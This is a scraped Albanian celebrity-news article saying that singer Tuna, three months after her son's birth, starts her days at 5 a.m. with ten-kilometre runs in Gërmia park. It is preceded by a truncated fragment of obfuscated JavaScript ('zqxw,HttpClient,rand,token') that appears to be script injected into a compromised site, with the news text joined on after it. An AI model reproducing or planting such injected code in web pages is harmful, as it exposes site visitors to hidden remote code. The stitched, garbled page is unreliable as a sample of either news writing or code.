;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mëngjeset e reja të Tunës: Ja ku e gjeni këngëtaren në 5 të mëngjesit

By

Tre muaj më parë solli në jetë Tianin i cili i ndërroi komplet ritmin e jetës duke bërë që e gjithë koha dhe dashuria t’i dedikohen princit të vogël.

Megjithatë, këngëtarja Altuna Sejdi – Tuna krahas përkushtimit për të birin po gjen kohë edhe për vete.

Me synimin për t’iu rikthyer formave të dikurshme sa më shpejt që të jetë e mundshme ajo po i nënshtrohet një regjimi të ushtrimeve dhe aktiviteteve fizike që nisin nga ora 5 e mëngjësit.

Në këtë periudhë, këngëtarja nis ditën në Gërmi ku bashkë me një ekip të pasionantëve të vrapimit përshkojnë shtigjet e parkut të madh të qytetit.

Tuna madje po arrin të shënoj rekorde personale duke vrapuar rreth dhjetë kilometra në ditë. /Prive.al/

Artikuj të ngjashëm